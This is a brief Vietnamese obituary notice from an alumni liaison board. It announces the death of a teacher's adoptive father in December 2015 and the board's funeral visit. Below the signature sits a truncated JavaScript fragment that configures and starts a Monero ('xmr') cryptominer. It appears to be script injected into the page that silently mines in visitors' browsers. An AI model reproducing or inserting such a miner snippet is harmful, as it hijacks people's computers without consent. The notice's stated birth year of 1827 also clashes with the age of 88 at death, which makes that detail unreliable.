TIN BUỒN

TIN BUỒN

Cụ ông Nguyễn Văn Bảy, sinh năm 1827, tại Thạnh Phú - Bến Tre
Dưỡng phụ
của thầy Nguyễn Tông Lộc, giáo viên trường Nông Lâm Súc Định Tường - Bến Tre
Đã  từ trần ngày 28 tháng 12 năm 2015 ( Nhằm ngày 18 tháng 11 Ất Mùi..)
Thọ 88 tuổi.
Linh cửu hoàn tại tư gia ; Đại lộ Hùng Vương nối dài.Thành Phố Mỹ Tho
Ban Liên Lạc và các anh chị em Cựu Học Viên  nls Định Tường sẽ đi viếng tang vào lúc 15 giờ ngày 29 tháng 12 năm 2015 ( nhằm ngày 19 tháng 11 năm Ất Mùi)

Thành kính phân ưu cùng gia quyến Thầy Nguyễn Tông Lộc, cầu chúc hương hồn cụ sớm tiêu diêu nơi miền cực lạc.

 Ban LL Nông Lâm Súc Định Tường


', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();